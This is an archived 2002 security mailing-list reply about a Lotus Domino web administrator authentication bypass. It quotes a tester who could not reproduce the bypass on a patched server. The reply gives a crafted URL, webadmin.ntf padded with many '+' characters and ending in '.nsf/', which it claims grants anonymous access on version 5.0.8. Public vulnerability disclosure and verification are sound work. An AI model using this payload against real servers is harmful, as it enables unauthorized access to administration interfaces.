Re: Antwort: Lotus Domino url bypass

["CT" <ct () arnet com ar>]

http://www.xxxx.com/webadmin.ntf++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++.nsf/
Get in like an Anonimous access, tested with a 219 buffer caracters
exactly - 5.0.8 version - But, in the version 5.0.4 dsn´t work:

Dominio web administrator is unable to run
The database "webadmin.nsf" needs to be signed with and ID file wich
is granted "Run unrestricted Lotuscript/Java agents".

CyRaNo
www.heinekenteam.com
Carolyn Meinel fan´s club

----- Original Message -----
From: <j.mickerts () gmx net>
To: <gmaggiot () ciudad com ar>
Cc: <bugtraq () securityfocus com>; <gabi () postino8 int prima com ar>;
<vuln-dev () securityfocus com>
Sent: Monday, February 04, 2002 5:35 AM
Subject: Antwort: Lotus Domino url bypass


> Hi,
>
> this does not work for me. I tested it against Domino 5.0.8 on Windows
> 2000 SP2 with all actual patches. I get redirected to the login-page. How
> are your ACLs on the template? Mine do not allow Anonymous or Default any
> access. Maybe this corrects the issue. I also use SSL to connect, but this
> should not interfere with the exploit. Maybe you should state version and
> platform.
>
> Kind regards,
>
> Jens Mickerts